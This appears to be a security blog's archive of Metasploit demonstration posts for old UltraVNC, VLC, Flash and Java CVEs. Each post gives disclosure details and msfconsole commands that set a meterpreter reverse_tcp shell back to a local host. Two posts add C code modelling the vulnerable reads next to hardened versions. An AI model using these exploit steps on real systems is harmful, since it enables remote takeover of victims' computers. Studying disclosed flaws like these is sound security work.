Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2008-0610 UltraVNC 1.0.2 Client Buffer Overflow Metasploit Demo

Timeline :

Vulnerability reported by the vendor on 2008-02-08
Metasploit PoC provided on 2012-03-26

PoC provided by :

noperand

Reference(s) :

CVE-2008-0610
OSVDB-42840

Affected version(s) :

UltraVNC Viewer 1.0.2 and 1.0.4 RC

Tested on Windows XP Pro SP3 with :

UltraVNC Viewer 1.0.2

Description :

This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release. If a malicious server answers the client connection with a protocol minor version of 14 or 16, the client next reads a 32-bit integer from the TCP stream and uses it, unchecked, as the length of a further read from the TCP stream into a 1024-byte character array on the stack. Since the server controls both the version string and the length field, any viewer that connects to a hostile server can be made to overflow that buffer.
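The read pattern described above, as an added illustration (not UltraVNC source and not the Metasploit module): a minimal model of the client's handling of the RFB version banner followed by a 32-bit length, in the vulnerable shape next to a hardened one. The banner layout ("RFB 003.0xx\n" then a big-endian length) and the buffer size of 1024 bytes are taken from the description; the function names and the constructed server response are this example's own. The vulnerable variant only reports how many bytes the original code would copy rather than performing the copy, so it can be run safely.

```c
/* Model of the client-side read that CVE-2008-0610 describes: after the
 * server announces protocol 3.14 or 3.16, the client reads a 32-bit length
 * and then reads that many bytes into a 1024-byte stack buffer.
 * Added illustration only; this is not UltraVNC code. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CLIENT_BUF 1024   /* size of the stack array named in the advisory */

/* Big-endian 32-bit read, as the value appears on the wire. */
static uint32_t rd_be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Parse the 12-byte banner "RFB 003.0xx\n" and return the minor version,
 * or -1 if the bytes are not a well-formed 3.x banner. */
static int rfb_minor_version(const uint8_t *msg, size_t n)
{
    if (n < 12 || memcmp(msg, "RFB 003.0", 9) != 0 || msg[11] != '\n')
        return -1;
    if (msg[9] < '0' || msg[9] > '9' || msg[10] < '0' || msg[10] > '9')
        return -1;
    return (msg[9] - '0') * 10 + (msg[10] - '0');
}

/* Vulnerable shape: returns the byte count the original client would copy
 * into its 1024-byte array. The copy itself is deliberately not performed;
 * a return value above CLIENT_BUF is the overflow. */
size_t vulnerable_copy_len(const uint8_t *stream, size_t n)
{
    int minor = rfb_minor_version(stream, n);
    if (minor != 14 && minor != 16)   /* other versions take another path */
        return 0;
    if (n < 16)
        return 0;
    return rd_be32(stream + 12);      /* trusted straight from the socket */
}

/* Hardened shape: the length is checked against the destination size and
 * against what the stream actually holds before anything is copied.
 * Returns the payload length, or a negative code on rejection. */
int hardened_read(const uint8_t *stream, size_t n, char out[CLIENT_BUF])
{
    int minor = rfb_minor_version(stream, n);
    if (minor != 14 && minor != 16)
        return -1;
    if (n < 16)
        return -2;
    uint32_t len = rd_be32(stream + 12);
    if (len > CLIENT_BUF - 1)         /* keep one byte for the terminator */
        return -3;
    if (len > n - 16)                 /* short read, not an overflow */
        return -4;
    memcpy(out, stream + 16, len);
    out[len] = '\0';
    return (int)len;
}

/* Constructed test data: the first 16 bytes a hostile server would send,
 * a 3.14 banner followed by an arbitrary claimed length. */
size_t build_malicious_banner(uint8_t *buf, size_t cap, uint32_t claimed_len)
{
    if (cap < 16)
        return 0;
    memcpy(buf, "RFB 003.014\n", 12);
    buf[12] = (uint8_t)(claimed_len >> 24);
    buf[13] = (uint8_t)(claimed_len >> 16);
    buf[14] = (uint8_t)(claimed_len >> 8);
    buf[15] = (uint8_t)claimed_len;
    return 16;
}

int main(void)
{
    uint8_t wire[64];
    char out[CLIENT_BUF];
    size_t n = build_malicious_banner(wire, sizeof wire, 0x10000);
    printf("vulnerable client would copy %zu bytes into a %d-byte buffer\n",
           vulnerable_copy_len(wire, n), CLIENT_BUF);
    printf("hardened client returns %d\n", hardened_read(wire, n, out));
    return 0;
}
```

The check that matters is the comparison of the wire length against the destination size before the copy; the second check (length versus bytes available) turns a truncated stream into an ordinary error instead of a read past the buffer.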

Commands :

use exploit/windows/vnc/ultravnc_viewer_bof
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2008-5036 VLC Media Player RealText Subtitle Overflow Metasploit Demo

Timeline :

Vulnerability found by Tobias Klein
Vulnerability reported to the vendor by Tobias Klein on 2008-11-03
Coordinated public release of the vulnerability on 2008-11-05
Metasploit PoC provided on 2012-03-01

PoC provided by :

Tobias Klein
SkD
juan vazquez

Reference(s) :

CVE-2008-5036
OSVDB-49809
VideoLAN-SA-0810
TKADV2008-011

Affected version(s) :

VLC media player 0.5.0 through 0.9.5

Tested on Windows XP Pro SP3 with :

VLC 0.9.4

Description :

This module exploits a stack buffer overflow vulnerability in VideoLAN VLC before 0.9.6. The vulnerability exists in the parsing of RealText subtitle files. To exploit it, the module generates two files: the .mp4 file is the decoy the victim is tricked into opening, and the .rt file is the malicious RealText subtitle file that actually triggers the vulnerability. The .rt file must be placed in the same directory as the .mp4 file so that VLC loads it as the subtitle track.
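A generic model of the bug class the advisory names, as an added illustration (not VLC's code, and not a reproduction of its exact code path): a RealText `<time begin="...">` attribute value copied into a fixed-size stack buffer without a bound, beside a bounded version. The buffer size of 32 bytes, the function names and the constructed .rt documents are this example's own assumptions; the vulnerable variant reports the length it would copy instead of copying it.

```c
/* Model of an unbounded attribute copy while parsing RealText subtitles.
 * Added illustration of the bug class only; this is not VLC source. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define TIME_BUF 32   /* assumed size of the fixed stack buffer in the model */

static const char TIME_TAG[] = "<time begin=\"";

/* Vulnerable shape: the length of the attribute value the parser would copy
 * into TIME_BUF bytes with no bound. Returns -1 if there is no such tag or
 * the value is unterminated. A result >= TIME_BUF is the overflow. */
long vulnerable_time_len(const char *rt)
{
    const char *p = strstr(rt, TIME_TAG);
    if (!p)
        return -1;
    p += sizeof TIME_TAG - 1;
    const char *q = strchr(p, '"');       /* copies up to the closing quote */
    if (!q)
        return -1;
    return (long)(q - p);
}

/* Hardened shape: same scan, but the value is bounded by the destination
 * before the copy. Returns the value length, or a negative code. */
int hardened_time_attr(const char *rt, char out[TIME_BUF])
{
    const char *p = strstr(rt, TIME_TAG);
    if (!p)
        return -1;                        /* no <time begin= tag */
    p += sizeof TIME_TAG - 1;
    const char *q = strchr(p, '"');
    if (!q)
        return -2;                        /* unterminated attribute */
    size_t len = (size_t)(q - p);
    if (len >= TIME_BUF)
        return -3;                        /* would not fit with terminator */
    memcpy(out, p, len);
    out[len] = '\0';
    return (int)len;
}

/* Constructed test input: a small RealText document whose begin attribute
 * is the caller-supplied string. The caller frees the result. */
char *build_rt(const char *begin)
{
    const char *head = "<window duration=\"10\">\n<time begin=\"";
    const char *tail = "\"/>subtitle text\n</window>\n";
    size_t n = strlen(head) + strlen(begin) + strlen(tail) + 1;
    char *doc = malloc(n);
    if (!doc)
        return NULL;
    strcpy(doc, head);
    strcat(doc, begin);
    strcat(doc, tail);
    return doc;
}

int main(void)
{
    char out[TIME_BUF];
    char big[301];
    memset(big, 'A', 300);
    big[300] = '\0';

    char *benign = build_rt("00:00:01.5");
    char *hostile = build_rt(big);
    printf("benign: vulnerable copies %ld, hardened returns %d (%s)\n",
           vulnerable_time_len(benign), hardened_time_attr(benign, out), out);
    printf("hostile: vulnerable copies %ld into %d bytes, hardened returns %d\n",
           vulnerable_time_len(hostile), TIME_BUF, hardened_time_attr(hostile, out));
    free(benign);
    free(hostile);
    return 0;
}
```

When writing a parser for a text format like this, the bound belongs at the copy, not only in a later sanity check on the parsed value: a timestamp that fails to parse is harmless, a value that overran the buffer already is not.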

Commands :

use exploit/windows/fileformat/vlc_realtext
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit -j

sysinfo
getuid

CVE-2012-0754 Adobe Flash Player MP4 Overflow Metasploit Demo

Timeline :

Vulnerability found by Alexander Gavrun from ZDI
Vulnerability reported to the vendor by ZDI on 2012-01-12
Coordinated public release of the vulnerability on 2012-02-15
Vulnerability reported as exploited in the wild by contagio on 2012-03-02
Metasploit PoC provided on 2012-03-07

PoC provided by :

Alexander Gavrun
sinn3r
juan vazquez

Reference(s) :

CVE-2012-0754
OSVDB-79300
APSB12-03
ZDI-12-080
contagio

Affected version(s) :

Adobe Flash Player 11.1.102.55 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems
Adobe Flash Player 11.1.112.61 and earlier versions for Android 4.x, and Adobe Flash Player 11.1.111.5 and earlier versions for Android 3.x and 2.x

Tested on Windows XP Pro SP3 with :

Adobe Flash Player 11.1.102.55
Internet Explorer 8

Description :

This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt .mp4 file that Flash loads, it is possible to gain arbitrary remote code execution in the context of the user. This vulnerability has been exploited in the wild as part of the “Iran’s Oil and Nuclear Situation.doc” e-mail attack.

Commands :

use exploit/windows/browser/adobe_flash_mp4_cprt
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-0500 Oracle Java Web Start Plugin Command Line Argument Injection Metasploit Demo

Timeline :

Vulnerability “ZDI-12-037” reported by Chris Ries to ZDI
Vulnerability reported to the vendor by ZDI on 2011-10-28 for “ZDI-12-037”
Coordinated public release of the vulnerability on 2012-02-22
Metasploit PoC provided on 2012-02-23

PoC provided by :

jduck

Reference(s) :

CVE-2012-0500
OSVDB-79227
ZDI-12-037
TSL20120214-01
Oracle Java SE Critical Patch Update Advisory – February 2012

Affected version(s) :

Oracle Java Development Kit (JDK) 6 Update 30 and prior
Oracle Java Development Kit (JDK) 7 Update 2 and prior
Oracle JavaFX 2.0.2 and prior
Oracle Java Runtime Environment (JRE) 6 Update 30 and prior
Oracle Java Runtime Environment (JRE) 7 Update 2 and prior

Tested on Windows XP Pro SP3 with :

Java 6 Update 30
Internet Explorer 8

Description :

This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By using the lesser-known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. For this module to work, it must be run as root on a server that does not already serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.

Commands :

use exploit/windows/browser/java_ws_vmargs
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid